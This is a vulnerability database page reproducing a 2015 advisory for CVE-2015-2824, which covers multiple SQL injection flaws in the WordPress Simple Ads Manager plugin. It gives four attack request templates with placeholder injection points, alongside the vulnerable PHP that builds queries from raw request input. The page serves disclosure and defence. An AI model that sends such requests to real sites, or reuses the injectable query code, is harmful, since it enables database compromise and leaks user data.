Vulners
Lucene search
WordPress Simple Ads Manager 2.5.94 / 2.5.96 SQL Injection
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Wordpress Simple Ads Manager Plugin - Multiple SQL Injection Vulnerability | 2 Apr 201500:00 | – | zdt |
 | CVE-2015-2824 | 2 Apr 201500:00 | – | circl |
 | WordPress Plugin Simple Ads Manager SQL Injection Vulnerability | 7 Apr 201500:00 | – | cnvd |
 | CVE-2015-2824 | 6 Apr 201515:00 | – | cve |
 | CVE-2015-2824 | 6 Apr 201515:00 | – | cvelist |
 | WordPress Simple Ads Manager SQL Injection | 1 May 201500:00 | – | dsquare |
 | WordPress Plugin Simple Ads Manager - Multiple SQL Injections | 2 Apr 201500:00 | – | exploitdb |
 | WordPress Plugin Simple Ads Manager - Multiple SQL Injections | 2 Apr 201500:00 | – | exploitpack |
 | CVE-2015-2824 | 6 Apr 201515:59 | – | nvd |
 | WordPress Simple Ads Manager Plugin < 2.7.97 Multiple Vulnerabilities - Active Check | 14 Apr 201500:00 | – | openvas |
10
`#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL
Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link:
https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh ([email protected]) & ITAS Team
::PROOF OF CONCEPT::
---SQL INJECTION 1---
+ REQUEST:
POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION
HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL
INJECTION HERE>&level=3
- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:
case 'sam_ajax_sam_hits':
if(isset($_POST['hits']) && is_array($_POST['hits'])) {
$hits = $_POST['hits'];
$values = '';
$remoteAddr = $_SERVER['REMOTE_ADDR'];
foreach($hits as $hit) {
$values .= ((empty($values)) ? '' : ', ')
. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";
}
$sql = "INSERT INTO $sTable (id, pid, event_time,
event_type, remote_addr) VALUES {$values};";
$result = $wpdb->query($sql);
if($result > 0) echo json_encode(array('success'
=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));
else echo json_encode(array(
'success' => false,
'result' => $result,
'sql' => $sql,
'hits' => $hits,
'values' => $values
));
}
break;
---SQL INJECTION 2---
+REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code:
case 'sam_ajax_load_posts':
$custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';
$sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :
'Post';
$sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :
'Page';
//set @row_num = 0;
//SELECT @row_num := @row_num + 1 AS recid
$sql = "SELECT
wp.id,
wp.post_title AS title,
wp.post_type AS type
FROM
$postTable wp
WHERE
wp.post_status = 'publish' AND
FIND_IN_SET(wp.post_type, 'post,page{$custs}')
ORDER BY wp.id;";
$posts = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($posts as &$val) {
switch($val['type']) {
case 'post':
$val['type'] = $sPost;
break;
case 'page':
$val['type'] = $sPage;
break;
default:
$val['type'] = $sPost . ': '.$val['type'];
break;
}
$k++;
$val['recid'] = $k;
}
$out = array(
'status' => 'success',
'total' => count($posts),
'records' => $posts
);
break;
---SQL INJECTION 3---
+REQUEST:
POST
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL
INJECTION HERE> HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmb=30068390.1.10.1427794022; __utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
action=load_combo_data
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+Vulnerable code: from line 225 to 255
case 'sam_ajax_load_combo_data':
$page = $_GET['page'];
$rows = $_GET['rows'];
$searchTerm = $_GET['searchTerm'];
$offset = ((int)$page - 1) * (int)$rows;
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
wu.user_email AS email
FROM
$uTable wu
WHERE wu.user_nicename LIKE '{$searchTerm}%'
ORDER BY wu.id
LIMIT $offset, $rows;";
$users = $wpdb->get_results($sql, ARRAY_A);
$sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE
'{$searchTerm}%';";
$rTotal = $wpdb->get_var($sql);
$total = ceil((int)$rTotal/(int)$rows);
$out = array(
'page' => $page,
'records' => count($users),
'rows' => $users,
'total' => $total,
'offset' => $offset
);
break;
---SQL INJECTION 4---
+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;
__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
;
wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%
3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3
Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;
wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;
wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;
__utmc=30068390
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
action=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION
HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL
INJECTION HERE>&sadmin=<SQL INJECTION HERE>
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Vulnerable code: from line 188 to 223
case 'sam_ajax_load_users':
$roleSubscriber = (isset($_REQUEST['subscriber'])) ?
urldecode($_REQUEST['subscriber']) : 'Subscriber';
$roleContributor = (isset($_REQUEST['contributor'])) ?
urldecode($_REQUEST['contributor']) : 'Contributor';
$roleAuthor = (isset($_REQUEST['author'])) ?
urldecode($_REQUEST['author']) : 'Author';
$roleEditor = (isset($_REQUEST['editor'])) ?
urldecode($_REQUEST['editor']) : 'Editor';
$roleAdministrator = (isset($_REQUEST["admin"])) ?
urldecode($_REQUEST["admin"]) : 'Administrator';
$roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?
urldecode($_REQUEST['sadmin']) : 'Super Admin';
$sql = "SELECT
wu.id,
wu.display_name AS title,
wu.user_nicename AS slug,
(CASE wum.meta_value
WHEN 0 THEN '$roleSubscriber'
WHEN 1 THEN '$roleContributor'
WHEN 2 THEN '$roleAuthor'
ELSE
IF(wum.meta_value > 2 AND wum.meta_value <= 7,
'$roleEditor',
IF(wum.meta_value > 7 AND wum.meta_value <= 10,
'$roleAdministrator',
IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)
)
)
END) AS role
FROM $uTable wu
INNER JOIN $umTable wum
ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'
ORDER BY wu.id;";
$users = $wpdb->get_results($sql, ARRAY_A);
$k = 0;
foreach($users as &$val) {
$k++;
$val['recid'] = $k;
}
$out = $users;
break;
REFERENCE:
+ https://www.youtube.com/watch?v=HPJ1r9dhIB4
Best Regards
-----------------------------------
ITAS Team (www.itas.vn)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Apr 2015 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.11773